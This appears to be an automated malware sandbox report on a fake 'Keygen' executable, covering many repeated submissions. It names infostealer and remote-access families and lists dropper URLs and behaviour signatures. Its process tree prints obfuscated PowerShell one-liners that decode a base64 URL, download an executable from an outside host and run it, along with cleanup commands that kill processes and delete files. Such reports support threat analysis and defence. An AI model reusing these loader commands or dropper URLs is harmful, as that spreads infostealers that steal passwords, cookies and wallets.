Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    151s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (5).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:03:52 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (449 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 58 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (5).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (5).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\A351.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (5).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1856
      • C:\Users\Admin\AppData\Local\Temp\A351.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1872
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A351.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1600
          • C:\Users\Public\arj.exe
            "C:\Users\Public\arj.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2652
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2800
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3008
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 3008 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\487063580380126\\* & exit
                  8⤵
                    PID:2776
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 3008
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3036
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2840
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2948
              • C:\Users\Public\arj.exe
                "C:\Users\Public\arj.exe"
                6⤵
                • Executes dropped EXE
                PID:2984
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A351.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1960
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
            • C:\Users\Public\tnw.exe
              "C:\Users\Public\tnw.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2328
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:1612
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1624
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2140
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2704
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:1596
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2932
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2932 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\617195155868809\\* & exit
                      9⤵
                        PID:2116
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2932
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2720
                • C:\Users\Public\tnw.exe
                  "C:\Users\Public\tnw.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1708
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:1820
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A351.tmp\b.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:564
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
